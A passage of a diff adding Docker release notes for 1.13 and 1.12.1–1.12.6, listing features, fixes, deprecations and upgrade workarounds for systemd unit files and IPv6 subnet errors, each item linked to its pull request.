++ Add `--no-trunc` to service/node/stack ps output [#25337](https://github.com/docker/docker/pull/25337)
++ Add Logs to `ContainerAttachOptions` so go clients can request to retrieve container logs as part of the attach process [#26718](https://github.com/docker/docker/pull/26718)
++ Allow client to talk to an older server [#27745](https://github.com/docker/docker/pull/27745)
+* Inform user client-side that a container removal is in progress [#26074](https://github.com/docker/docker/pull/26074)
++ Add `Isolation` to the /info endpoint [#26255](https://github.com/docker/docker/pull/26255)
++ Add `userns` to the /info endpoint [#27840](https://github.com/docker/docker/pull/27840)
+- Do not allow more than one mode be requested at once in the services endpoint [#26643](https://github.com/docker/docker/pull/26643)
++ Add capability to /containers/create API to specify mounts in a more granular and safer way [#22373](https://github.com/docker/docker/pull/22373)
++ Add `--format` flag to `network ls` and `volume ls` [#23475](https://github.com/docker/docker/pull/23475)
+* Allow the top-level `docker inspect` command to inspect any kind of resource [#23614](https://github.com/docker/docker/pull/23614)
++ Add --cpus flag to control cpu resources for `docker run` and `docker create`, and add `NanoCPUs` to `HostConfig` [#27958](https://github.com/docker/docker/pull/27958)
+- Allow unsetting the `--entrypoint` in `docker run` or `docker create` [#23718](https://github.com/docker/docker/pull/23718)
+* Restructure CLI commands by adding `docker image` and `docker container` commands for more consistency [#26025](https://github.com/docker/docker/pull/26025)
+- Remove `COMMAND` column from `service ls` output [#28029](https://github.com/docker/docker/pull/28029)
++ Add `--format` to `docker events` [#26268](https://github.com/docker/docker/pull/26268)
+* Allow specifying multiple nodes on `docker node ps` [#26299](https://github.com/docker/docker/pull/26299)
+* Restrict fractional digits to 2 decimals in `docker images` output [#26303](https://github.com/docker/docker/pull/26303)
++ Add `--dns-option` to `docker run` [#28186](https://github.com/docker/docker/pull/28186)
++ Add Image ID to container commit event [#28128](https://github.com/docker/docker/pull/28128)
++ Add external binaries version to docker info [#27955](https://github.com/docker/docker/pull/27955)
++ Add information for `Manager Addresses` in the output of `docker info` [#28042](https://github.com/docker/docker/pull/28042)
++ Add a new reference filter for `docker images` [#27872](https://github.com/docker/docker/pull/27872)
+
+### Runtime
+
++ Add `--experimental` daemon flag to enable experimental features, instead of shipping them in a separate build [#27223](https://github.com/docker/docker/pull/27223)
++ Add a `--shutdown-timeout` daemon flag to specify the default timeout (in seconds) to stop containers gracefully before daemon exit [#23036](https://github.com/docker/docker/pull/23036)
++ Add `--stop-timeout` to specify the timeout value (in seconds) for individual containers to stop [#22566](https://github.com/docker/docker/pull/22566)
++ Add a new daemon flag `--userland-proxy-path` to allow configuring the userland proxy instead of using the hardcoded `docker-proxy` from `$PATH` [#26882](https://github.com/docker/docker/pull/26882)
++ Add boolean flag `--init` on `dockerd` and on `docker run` to use [tini](https://github.com/krallin/tini) a zombie-reaping init process as PID 1 [#26061](https://github.com/docker/docker/pull/26061) [#28037](https://github.com/docker/docker/pull/28037)
++ Add a new daemon flag `--init-path` to allow configuring the path to the `docker-init` binary [#26941](https://github.com/docker/docker/pull/26941)
++ Add support for live reloading insecure registry in configuration [#22337](https://github.com/docker/docker/pull/22337)
++ Add support for storage-opt size on Windows daemons [#23391](https://github.com/docker/docker/pull/23391)
+* Improve reliability of `docker run --rm` by moving it from the client to the daemon  [#20848](https://github.com/docker/docker/pull/20848)
++ Add support for `--cpu-rt-period` and `--cpu-rt-runtime` flags, allowing containers to run real-time threads when `CONFIG_RT_GROUP_SCHED` is enabled in the kernel [#23430](https://github.com/docker/docker/pull/23430)
+* Allow parallel stop, pause, unpause [#24761](https://github.com/docker/docker/pull/24761) / [#26778](https://github.com/docker/docker/pull/26778)
+* Implement XFS quota for overlay2 [#24771](https://github.com/docker/docker/pull/24771)
+- Fix partial/full filter issue in `service tasks --filter` [#24850](https://github.com/docker/docker/pull/24850)
+- Allow engine to run inside a user namespace [#25672](https://github.com/docker/docker/pull/25672)
+- Fix a race condition between device deferred removal and resume device, when using the devicemapper graphdriver [#23497](https://github.com/docker/docker/pull/23497)
+- Add `docker stats` support in Windows [#25737](https://github.com/docker/docker/pull/25737)
+- Allow using `--pid=host` and `--net=host` when `--userns=host` [#25771](https://github.com/docker/docker/pull/25771)
++ (experimental) Add metrics (Prometheus) output for basic `container`, `image`, and `daemon` operations [#25820](https://github.com/docker/docker/pull/25820)
+- Fix issue in `docker stats` with `NetworkDisabled=true` [#25905](https://github.com/docker/docker/pull/25905)
++ Add `docker top` support in Windows [#25891](https://github.com/docker/docker/pull/25891)
++ Record pid of exec'd process [#27470](https://github.com/docker/docker/pull/27470)
++ Add support for looking up user/groups via `getent` [#27599](https://github.com/docker/docker/pull/27599)
++ Add new `docker system` command with `df` and `prune` subcommands for system resource management, as well as `docker {container,image,volume,network} prune` subcommands [#26108](https://github.com/docker/docker/pull/26108) [#27525](https://github.com/docker/docker/pull/27525) / [#27525](https://github.com/docker/docker/pull/27525)
+- Fix an issue where containers could not be stopped or killed by setting xfs max_retries to 0 upon ENOSPC with devicemapper [#26212](https://github.com/docker/docker/pull/26212)
+- Fix `docker cp` failing to copy to a container's volume dir on CentOS with devicemapper [#28047](https://github.com/docker/docker/pull/28047)
+* Promote overlay(2) graphdriver [#27932](https://github.com/docker/docker/pull/27932)
++ Add `--seccomp-profile` daemon flag to specify a path to a seccomp profile that overrides the default [#26276](https://github.com/docker/docker/pull/26276)
+- Fix ulimits in `docker inspect` when `--default-ulimit` is set on daemon [#26405](https://github.com/docker/docker/pull/26405)
+- Add workaround for overlay issues during build in older kernels [#28138](https://github.com/docker/docker/pull/28138)
++ Add `TERM` environment variable on `docker exec -t` [#26461](https://github.com/docker/docker/pull/26461)
+* Honor a container’s `--stop-signal` setting upon `docker kill` [#26464](https://github.com/docker/docker/pull/26464)
+
+### Swarm Mode
+
++ Add secret management [#27794](https://github.com/docker/docker/pull/27794)
++ Add support for templating service options (hostname, mounts, and environment variables) [#28025](https://github.com/docker/docker/pull/28025)
+* Display the endpoint mode in the output of `docker service inspect --pretty` [#26906](https://github.com/docker/docker/pull/26906)
+* Make `docker service ps` output more bearable by shortening service IDs in task names [#28088](https://github.com/docker/docker/pull/28088)
+* Make `docker node ps` default to the current node [#25214](https://github.com/docker/docker/pull/25214)
++ Add `--dns`, -`-dns-opt`, and `--dns-search` to service create. [#27567](https://github.com/docker/docker/pull/27567)
++ Add `--force` to `docker service update` [#27596](https://github.com/docker/docker/pull/27596)
++ Add `--health-*` and `--no-healthcheck` flags to `docker service create` and `docker service update` [#27369](https://github.com/docker/docker/pull/27369)
++ Add `-q` to `docker service ps` [#27654](https://github.com/docker/docker/pull/27654)
+* Display number of global services in `docker service ls` [#27710](https://github.com/docker/docker/pull/27710)
+- Remove `--name` flag from `docker service update`. This flag is only functional on `docker service create`, so was removed from the `update` command [#26988](https://github.com/docker/docker/pull/26988)
+- Fix worker nodes failing to recover because of transient networking issues [#26646](https://github.com/docker/docker/issues/26646)
+* Add support for health aware load balancing and DNS records [#27279](https://github.com/docker/docker/pull/27279)
++ Add `--hostname` to `docker service create` [#27857](https://github.com/docker/docker/pull/27857)
++ Add `--host` to `docker service create`, and `--host-add`, `--host-rm` to `docker service update` [#28031](https://github.com/docker/docker/pull/28031)
++ Add `--tty` flag to `docker service create`/`update` [#28076](https://github.com/docker/docker/pull/28076)
+* Autodetect, store, and expose node IP address as seen by the manager [#27910](https://github.com/docker/docker/pull/27910)
+* Encryption at rest of manager keys and raft data [#27967](https://github.com/docker/docker/pull/27967)
++ Add `--update-max-failure-ratio`, `--update-monitor` and `--rollback` flags to `docker service update` [#26421](https://github.com/docker/docker/pull/26421)
+- Fix an issue with address autodiscovery on `docker swarm init` running inside a container [#26457](https://github.com/docker/docker/pull/26457)
++ (experimental) Add `docker service logs` command to view logs for a service [#28089](https://github.com/docker/docker/pull/28089)
++ Pin images by digest for `docker service create` and `update` [#28173](https://github.com/docker/docker/pull/28173)
+* Add short (`-f`) flag for `docker node rm --force` and `docker swarm leave --force` [#28196](https://github.com/docker/docker/pull/28196)
++ Add options to customize Raft snapshots (`--max-snapshots`, `--snapshot-interval`) [#27997](https://github.com/docker/docker/pull/27997)
+- Don't repull image if pinned by digest [#28265](https://github.com/docker/docker/pull/28265)
++ Swarm-mode support for Windows [#27838](https://github.com/docker/docker/pull/27838)
++ Allow hostname to be updated on service [#28771](https://github.com/docker/docker/pull/28771)
++ Support v2 plugins [#29433](https://github.com/docker/docker/pull/29433)
++ Add content trust for services [#29469](https://github.com/docker/docker/pull/29469)
+
+### Volume
+
++ Add support for labels on volumes [#21270](https://github.com/docker/docker/pull/21270)
++ Add support for filtering volumes by label [#25628](https://github.com/docker/docker/pull/25628)
+* Add a `--force` flag in `docker volume rm` to forcefully purge the data of the volume that has already been deleted [#23436](https://github.com/docker/docker/pull/23436)
+* Enhance `docker volume inspect` to show all options used when creating the volume [#26671](https://github.com/docker/docker/pull/26671)
+* Add support for local NFS volumes to resolve hostnames [#27329](https://github.com/docker/docker/pull/27329)
+
+### Security
+
+- Fix selinux labeling of volumes shared in a container [#23024](https://github.com/docker/docker/pull/23024)
+- Prohibit `/sys/firmware/**` from being accessed with apparmor [#26618](https://github.com/docker/docker/pull/26618)
+
+### DEPRECATION
+
+- Marked the `docker daemon` command as deprecated. The daemon is moved to a separate binary (`dockerd`), and should be used instead [#26834](https://github.com/docker/docker/pull/26834)
+- Deprecate unversioned API endpoints [#28208](https://github.com/docker/docker/pull/28208)
+- Remove Ubuntu 15.10 (Wily Werewolf) as supported platform. Ubuntu 15.10 is EOL, and no longer receives updates [#27042](https://github.com/docker/docker/pull/27042)
+- Remove Fedora 22 as supported platform. Fedora 22 is EOL, and no longer receives updates [#27432](https://github.com/docker/docker/pull/27432)
+- Remove Fedora 23 as supported platform. Fedora 23 is EOL, and no longer receives updates [#29455](https://github.com/docker/docker/pull/29455)
+- Deprecate the `repo:shortid` syntax on `docker pull` [#27207](https://github.com/docker/docker/pull/27207)
+- Deprecate backing filesystem without `d_type` for overlay and overlay2 storage drivers [#27433](https://github.com/docker/docker/pull/27433)
+- Deprecate `MAINTAINER` in Dockerfile [#25466](https://github.com/docker/docker/pull/25466)
+- Deprecate `filter` param for endpoint `/images/json` [#27872](https://github.com/docker/docker/pull/27872)
+- Deprecate setting duplicate engine labels [#24533](https://github.com/docker/docker/pull/24533)
+- Deprecate "top-level" network information in `NetworkSettings` [#28437](https://github.com/docker/docker/pull/28437)
+
+## 1.12.6 (2017-01-10)
+
+**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+**NOTE**: Docker 1.12.5 will correctly validate that either an IPv6 subnet is provided or
+that the IPAM driver can provide one when you specify the `--ipv6` option.
+
+If you are currently using the `--ipv6` option _without_ specifying the
+`--fixed-cidr-v6` option, the Docker daemon will refuse to start with the
+following message:
+
+```none
+Error starting daemon: Error initializing network controller: Error creating
+                       default "bridge" network: failed to parse pool request
+                       for address space "LocalDefault" pool " subpool ":
+                       could not find an available, non-overlapping IPv6 address
+                       pool among the defaults to assign to the network
+```
+
+To resolve this error, either remove the `--ipv6` flag (to preserve the same
+behavior as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the
+value of the `--fixed-cidr-v6` flag.
+
+In a similar way, if you specify the `--ipv6` flag when creating a network
+with the default IPAM driver, without providing an IPv6 `--subnet`, network
+creation will fail with the following message:
+
+```none
+Error response from daemon: failed to parse pool request for address space
+                            "LocalDefault" pool "" subpool "": could not find an
+                            available, non-overlapping IPv6 address pool among
+                            the defaults to assign to the network
+```
+
+To resolve this, either remove the `--ipv6` flag (to preserve the same behavior
+as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the value of the
+`--subnet` flag.
+
+The network network creation will instead succeed if you use an external IPAM driver
+which supports automatic allocation of IPv6 subnets.
+
+### Runtime
+
+- Fix runC privilege escalation (CVE-2016-9962)
+
+## 1.12.5 (2016-12-15)
+
+**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+**NOTE**: Docker 1.12.5 will correctly validate that either an IPv6 subnet is provided or
+that the IPAM driver can provide one when you specify the `--ipv6` option.
+
+If you are currently using the `--ipv6` option _without_ specifying the
+`--fixed-cidr-v6` option, the Docker daemon will refuse to start with the
+following message:
+
+```none
+Error starting daemon: Error initializing network controller: Error creating
+                       default "bridge" network: failed to parse pool request
+                       for address space "LocalDefault" pool " subpool ":
+                       could not find an available, non-overlapping IPv6 address
+                       pool among the defaults to assign to the network
+```
+
+To resolve this error, either remove the `--ipv6` flag (to preserve the same
+behavior as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the
+value of the `--fixed-cidr-v6` flag.
+
+In a similar way, if you specify the `--ipv6` flag when creating a network
+with the default IPAM driver, without providing an IPv6 `--subnet`, network
+creation will fail with the following message:
+
+```none
+Error response from daemon: failed to parse pool request for address space
+                            "LocalDefault" pool "" subpool "": could not find an
+                            available, non-overlapping IPv6 address pool among
+                            the defaults to assign to the network
+```
+
+To resolve this, either remove the `--ipv6` flag (to preserve the same behavior
+as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the value of the
+`--subnet` flag.
+
+The network network creation will instead succeed if you use an external IPAM driver
+which supports automatic allocation of IPv6 subnets.
+
+### Runtime
+
+- Fix race on sending stdin close event [#29424](https://github.com/docker/docker/pull/29424)
+
+### Networking
+
+- Fix panic in docker network ls when a network was created with `--ipv6` and no ipv6 `--subnet` in older docker versions [#29416](https://github.com/docker/docker/pull/29416)
+
+### Contrib
+
+- Fix compilation on Darwin [#29370](https://github.com/docker/docker/pull/29370)
+
+## 1.12.4 (2016-12-12)
+
+**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+
+### Runtime
+
+- Fix issue where volume metadata was not removed [#29083](https://github.com/docker/docker/pull/29083)
+- Asynchronously close streams to prevent holding container lock [#29050](https://github.com/docker/docker/pull/29050)
+- Fix selinux labels for newly created container volumes [#29050](https://github.com/docker/docker/pull/29050)
+- Remove hostname validation [#28990](https://github.com/docker/docker/pull/28990)
+- Fix deadlocks caused by IO races [#29095](https://github.com/docker/docker/pull/29095) [#29141](https://github.com/docker/docker/pull/29141)
+- Return an empty stats if the container is restarting [#29150](https://github.com/docker/docker/pull/29150)
+- Fix volume store locking [#29151](https://github.com/docker/docker/pull/29151)
+- Ensure consistent status code in API [#29150](https://github.com/docker/docker/pull/29150)
+- Fix incorrect opaque directory permission in overlay2 [#29093](https://github.com/docker/docker/pull/29093)
+- Detect plugin content and error out on `docker pull` [#29297](https://github.com/docker/docker/pull/29297)
+
+### Swarm Mode
+
+* Update Swarmkit [#29047](https://github.com/docker/docker/pull/29047)
+  - orchestrator/global: Fix deadlock on updates [docker/swarmkit#1760](https://github.com/docker/swarmkit/pull/1760)
+  - on leader switchover preserve the vxlan id for existing networks [docker/swarmkit#1773](https://github.com/docker/swarmkit/pull/1773)
+- Refuse swarm spec not named "default" [#29152](https://github.com/docker/docker/pull/29152)
+
+### Networking
+
+* Update libnetwork [#29004](https://github.com/docker/docker/pull/29004) [#29146](https://github.com/docker/docker/pull/29146)
+  - Fix panic in embedded DNS [docker/libnetwork#1561](https://github.com/docker/libnetwork/pull/1561)
+  - Fix unmarhalling panic when passing --link-local-ip on global scope network [docker/libnetwork#1564](https://github.com/docker/libnetwork/pull/1564)
+  - Fix panic when network plugin returns nil StaticRoutes [docker/libnetwork#1563](https://github.com/docker/libnetwork/pull/1563)
+  - Fix panic in osl.(*networkNamespace).DeleteNeighbor [docker/libnetwork#1555](https://github.com/docker/libnetwork/pull/1555)
+  - Fix panic in swarm networking concurrent map read/write [docker/libnetwork#1570](https://github.com/docker/libnetwork/pull/1570)
+  * Allow encrypted networks when running docker inside a container [docker/libnetwork#1502](https://github.com/docker/libnetwork/pull/1502)
+  - Do not block autoallocation of IPv6 pool [docker/libnetwork#1538](https://github.com/docker/libnetwork/pull/1538)
+  - Set timeout for netlink calls [docker/libnetwork#1557](https://github.com/docker/libnetwork/pull/1557)
+  - Increase networking local store timeout to one minute [docker/libkv#140](https://github.com/docker/libkv/pull/140)
+  - Fix a panic in libnetwork.(*sandbox).execFunc [docker/libnetwork#1556](https://github.com/docker/libnetwork/pull/1556)
+  - Honor icc=false for internal networks [docker/libnetwork#1525](https://github.com/docker/libnetwork/pull/1525)
+
+### Logging
+
+* Update syslog log driver [#29150](https://github.com/docker/docker/pull/29150)
+
+### Contrib
+
+- Run "dnf upgrade" before installing in fedora [#29150](https://github.com/docker/docker/pull/29150)
+- Add build-date back to RPM packages [#29150](https://github.com/docker/docker/pull/29150)
+- deb package filename changed to include distro to distinguish between distro code names [#27829](https://github.com/docker/docker/pull/27829)
+
+## 1.12.3 (2016-10-26)
+
+**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+
+### Runtime
+
+- Fix ambient capability usage in containers (CVE-2016-8867) [#27610](https://github.com/docker/docker/pull/27610)
+- Prevent a deadlock in libcontainerd for Windows [#27136](https://github.com/docker/docker/pull/27136)
+- Fix error reporting in CopyFileWithTar [#27075](https://github.com/docker/docker/pull/27075)
+* Reset health status to starting when a container is restarted [#27387](https://github.com/docker/docker/pull/27387)
+* Properly handle shared mount propagation in storage directory [#27609](https://github.com/docker/docker/pull/27609)
+- Fix docker exec [#27610](https://github.com/docker/docker/pull/27610)
+- Fix backward compatibility with containerd’s events log [#27693](https://github.com/docker/docker/pull/27693)
+
+### Swarm Mode
+
+- Fix conversion of restart-policy [#27062](https://github.com/docker/docker/pull/27062)
+* Update Swarmkit [#27554](https://github.com/docker/docker/pull/27554)
+ * Avoid restarting a task that has already been restarted [docker/swarmkit#1305](https://github.com/docker/swarmkit/pull/1305)
+ * Allow duplicate published ports when they use different protocols [docker/swarmkit#1632](https://github.com/docker/swarmkit/pull/1632)
+ * Allow multiple randomly assigned published ports on service [docker/swarmkit#1657](https://github.com/docker/swarmkit/pull/1657)
+ - Fix panic when allocations happen at init time [docker/swarmkit#1651](https://github.com/docker/swarmkit/pull/1651)
+
+### Networking
+
+* Update libnetwork [#27559](https://github.com/docker/docker/pull/27559)
+ - Fix race in serializing sandbox to string [docker/libnetwork#1495](https://github.com/docker/libnetwork/pull/1495)
+ - Fix race during deletion [docker/libnetwork#1503](https://github.com/docker/libnetwork/pull/1503)
+ * Reset endpoint port info on connectivity revoke in bridge driver [docker/libnetwork#1504](https://github.com/docker/libnetwork/pull/1504)
+ - Fix a deadlock in networking code [docker/libnetwork#1507](https://github.com/docker/libnetwork/pull/1507)
+ - Fix a race in load balancer state [docker/libnetwork#1512](https://github.com/docker/libnetwork/pull/1512)
+
+### Logging
+
+* Update fluent-logger-golang to v1.2.1 [#27474](https://github.com/docker/docker/pull/27474)
+
+### Contrib
+
+* Update buildtags for armhf ubuntu-trusty [#27327](https://github.com/docker/docker/pull/27327)
+* Add AppArmor to runc buildtags for armhf [#27421](https://github.com/docker/docker/pull/27421)
+
+## 1.12.2 (2016-10-11)
+
+**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+
+### Runtime
+
+- Fix a panic due to a race condition filtering `docker ps` [#26049](https://github.com/docker/docker/pull/26049)
+* Implement retry logic to prevent "Unable to remove filesystem" errors when using the aufs storage driver [#26536](https://github.com/docker/docker/pull/26536)
+* Prevent devicemapper from removing device symlinks if `dm.use_deferred_removal` is enabled [#24740](https://github.com/docker/docker/pull/24740)
+- Fix an issue where the CLI did not return correct exit codes if a command was run with invalid options [#26777](https://github.com/docker/docker/pull/26777)
+- Fix a panic due to a bug in stdout / stderr processing in health checks [#26507](https://github.com/docker/docker/pull/26507)
+- Fix exec's children handling [#26874](https://github.com/docker/docker/pull/26874)
+- Fix exec form of HEALTHCHECK CMD [#26208](https://github.com/docker/docker/pull/26208)
+
+### Networking
+
+- Fix a daemon start panic on armv5 [#24315](https://github.com/docker/docker/issues/24315)
+* Vendor libnetwork [#26879](https://github.com/docker/docker/pull/26879) [#26953](https://github.com/docker/docker/pull/26953)
+ * Avoid returning early on agent join failures [docker/libnetwork#1473](https://github.com/docker/libnetwork/pull/1473)
+ - Fix service published port cleanup issues [docker/libetwork#1432](https://github.com/docker/libnetwork/pull/1432) [docker/libnetwork#1433](https://github.com/docker/libnetwork/pull/1433)
+ * Recover properly from transient gossip failures [docker/libnetwork#1446](https://github.com/docker/libnetwork/pull/1446)
+ * Disambiguate node names known to gossip cluster to avoid node name collision [docker/libnetwork#1451](https://github.com/docker/libnetwork/pull/1451)
+ * Honor user provided listen address for gossip  [docker/libnetwork#1460](https://github.com/docker/libnetwork/pull/1460)
+ * Allow reachability via published port across services on the same host [docker/libnetwork#1398](https://github.com/docker/libnetwork/pull/1398)
+ * Change the ingress sandbox name from random id to just `ingress_sbox` [docker/libnetwork#1449](https://github.com/docker/libnetwork/pull/1449)
+ - Disable service discovery in ingress network [docker/libnetwork#1489](https://github.com/docker/libnetwork/pull/1489)
+
+### Swarm Mode
+
+* Fix remote detection of a node's address when it joins the cluster [#26211](https://github.com/docker/docker/pull/26211)
+* Vendor SwarmKit [#26765](https://github.com/docker/docker/pull/26765)
+ * Bounce session after failed status update [docker/swarmkit#1539](https://github.com/docker/swarmkit/pull/1539)
+ - Fix possible raft deadlocks [docker/swarmkit#1537](https://github.com/docker/swarmkit/pull/1537)
+ - Fix panic and endpoint leak when a service is updated with no endpoints [docker/swarmkit#1481](https://github.com/docker/swarmkit/pull/1481)
+ * Produce an error if the same port is published twice on `service create` or `service update` [docker/swarmkit#1495](https://github.com/docker/swarmkit/pull/1495)
+ - Fix an issue where changes to a service were not detected, resulting in the service not being updated [docker/swarmkit#1497](https://github.com/docker/swarmkit/pull/1497)
+ - Do not allow service creation on ingress network [docker/swarmkit#1600](https://github.com/docker/swarmkit/pull/1600)
+
+### Contrib
+
+* Update the debian sysv-init script to use `dockerd` instead of `docker daemon` [#25869](https://github.com/docker/docker/pull/25869)
+* Improve stability when running the docker client on MacOS Sierra [#26875](https://github.com/docker/docker/pull/26875)
+- Fix installation on debian stretch [#27184](https://github.com/docker/docker/pull/27184)
+
+### Windows
+
+- Fix an issue where arrow-navigation did not work when running the docker client in ConEmu [#25578](https://github.com/docker/docker/pull/25578)
+
+## 1.12.1 (2016-08-18)
+
+**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm
+based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When
+upgrading from an older version of docker, the upgrade process may not
+automatically install the updated version of the unit file, or fail to start
+the docker service if;
+
+- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or
+- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive
+
+Starting the docker service will produce an error:
+
+    Failed to start docker.service: Unit docker.socket failed to load: No such file or directory.
+
+or
+
+    no sockets found via socket activation: make sure the service was started by systemd.
+
+To resolve this:
+
+- Backup the current version of the unit file, and replace the file with the
+  [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm)
+- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present
+- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present).
+
+After making those changes, run `sudo systemctl daemon-reload`, and `sudo
+systemctl restart docker` to reload changes and (re)start the docker daemon.
+
+
+### Client
+
+* Add `Joined at` information in `node inspect --pretty` [#25512](https://github.com/docker/docker/pull/25512)
+- Fix a crash on `service inspect` [#25454](https://github.com/docker/docker/pull/25454)
+- Fix issue preventing `service update --env-add` to work as intended [#25427](https://github.com/docker/docker/pull/25427)
+- Fix issue preventing `service update --publish-add` to work as intended [#25428](https://github.com/docker/docker/pull/25428)
+- Remove `service update --network-add` and `service update --network-rm` flags
+  because this feature is not yet implemented in 1.12, but was inadvertently added
+  to the client in 1.12.0 [#25646](https://github.com/docker/docker/pull/25646)
+
+### Contrib
+
++ Official ARM installation for Debian Jessie, Ubuntu Trusty, and Raspbian Jessie [#24815](https://github.com/docker/docker/pull/24815) [#25591](https://github.com/docker/docker/pull/25637)
+- Add selinux policy per distro/version, fixing issue preventing successful installation on Fedora 24, and Oracle Linux [#25334](https://github.com/docker/docker/pull/25334) [#25593](https://github.com/docker/docker/pull/25593)
+
+### Networking
+
+- Fix issue that prevented containers to be accessed by hostname with Docker overlay driver in Swarm Mode [#25603](https://github.com/docker/docker/pull/25603) [#25648](https://github.com/docker/docker/pull/25648)
+- Fix random network issues on service with published port [#25603](https://github.com/docker/docker/pull/25603)
+- Fix unreliable inter-service communication after scaling down and up [#25603](https://github.com/docker/docker/pull/25603)
+- Fix issue where removing all tasks on a node and adding them back breaks connectivity with other services [#25603](https://github.com/docker/docker/pull/25603)
+- Fix issue where a task that fails to start results in a race, causing a `network xxx not found` error that masks the actual error [#25550](https://github.com/docker/docker/pull/25550)
+- Relax validation of SRV records for external services that use SRV records not formatted according to RFC 2782 [#25739](https://github.com/docker/docker/pull/25739)
+
+### Plugins (experimental)
+
